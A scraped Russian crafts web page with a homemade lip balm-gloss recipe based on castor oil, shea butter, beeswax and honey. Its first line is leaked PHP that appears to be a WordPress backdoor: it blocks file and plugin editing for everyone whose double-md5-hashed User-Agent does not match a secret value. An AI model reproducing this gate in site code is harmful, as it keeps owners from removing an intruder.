if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Блеск для губ своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт, как в домашних условиях сделать блеск для губ своими руками

Традиционным средством для изготовления косметических продуктов считается касторовое масло, благодаря его природным качествам и увлажняющему эффекту. Особенно полезным оно считается при уходе за кожей лица

Тра­ди­ци­он­ным сред­ством для изго­тов­ле­ния кос­ме­ти­че­ских про­дук­тов счи­та­ет­ся касто­ро­вое мас­ло, бла­го­да­ря его при­род­ным каче­ствам и увлаж­ня­ю­ще­му эффек­ту. Осо­бен­но полез­ным оно счи­та­ет­ся при ухо­де за кожей лица. Пред­ла­гаю вам сде­лать в домаш­них усло­ви­ях баль­зам-блеск для губ, на осно­ве касто­ро­во­го мас­ла, кото­рый не толь­ко при­даст блеск, но и зале­чит сухие и огру­бев­шие губы.

Глав­ным пре­иму­ще­ством домаш­не­го баль­за­ма счи­та­ет­ся то, что он не скле­и­ва­ет губы и в тече­нии все­го дня выгля­дит есте­ствен­но, слов­но маки­яж отсутствует.

Спи­сок ингре­ди­ен­тов, кото­рые пона­до­бят­ся для изго­тов­ле­ния блес­ка для губ:

  • Мас­ло касто­ро­вое — 2 ст. л.
  • Мас­ло ши – 1 ст. л.
  • Мас­ля­ной коко­со­вый экс­тракт – 1 ст. л.
  • Воск пче­ли­ный – 1 ст. л.
  • Мас­ло мяты переч­ной – 1 капля
  • Нату­раль­ный мед – 1 ст. л.
  • Неболь­шие кон­тей­не­ры, колбочки.

Шаг 1.

Поставь­те емкость с касто­ро­вым мас­лом и мас­лом ши на водя­ную баню. Для это­го сме­шай­те мас­ла в любой посу­де и опу­сти­те в кастрю­лю с кипя­щей водой.

Шаг 2.

После того как мас­ла перей­дут в состо­я­ние одно­род­ной мас­сы, добавь­те к ним пче­ли­ный воск, мед и мас­ло коко­са. Полу­чен­ную смесь необ­хо­ди­мо пере­ме­ши­вать до тех пор, пока она не ста­нет густой.

Шаг 3.

Убе­ри­те емкость с водя­ной бани и добавь­те в нее эфир­ное мас­ло, в моем слу­чае исполь­зу­ет­ся мас­ло переч­ной мяты.

Шаг 4.

Раз­лей­те полу­чен­ную смесь по малень­ким фор­моч­кам и оставь­те для засты­ва­ния при ком­нат­ной температуре.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Katerinka666

Люблю все творческое и считаю что нет цены тому, что сделано своими руками! С удовольствием делюсь своими мастер-классами и пользуюсь чужими для совершенствования своих навыков! Читайте все мои записи!